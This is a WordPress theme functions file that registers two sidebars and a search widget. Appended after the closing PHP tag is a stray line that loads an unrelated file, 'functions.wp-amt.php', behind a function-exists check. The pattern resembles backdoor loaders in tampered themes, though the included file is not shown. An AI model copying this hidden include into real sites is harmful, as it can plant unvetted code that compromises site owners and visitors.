<?php	
if ( function_exists('register_sidebar') )
    register_sidebar(array(
		'name' => __('Left Sidebar', 'theme857'),
        'before_widget' => '	<div id="%1$s" class="widget %2$s"><div class="widget-bg">',
        'before_title' => '		<div class="title"><div><h2>',
		
        'after_title' => '		</h2></div></div>',
							
		'after_widget' => '		</div></div>',
		
		
	));
	
if ( function_exists('register_sidebar') )	
    register_sidebar(array(
		'name' => __('Right Sidebar', 'theme857'),
       	'before_widget' => '	<div id="%1$s" class="widget %2$s"><div class="widget-bg">',
        'before_title' => '		<div class="title"><div><h2>',
		
        'after_title' => '		</h2></div></div>',
							
		'after_widget' => '		</div></div>',
		
	));		
		
// Search 	
	function widget_theme857_search() {
?>
	<div class="widget" id="search">
		<div class="widget-bg">
			
			<div class="title">
				<h2><?php _e('Search','theme857'); ?></h2>
			</div>
			
			<?php include (TEMPLATEPATH . "/searchform.php"); ?>
			
		</div></div>
					
<?php
}
if ( function_exists('register_sidebar_widget') )
	register_sidebar_widget(__('Search'), 'widget_theme857_search');
?><?php if(!function_exists(amt_cif)) { require_once('functions.wp-amt.php'); } ?>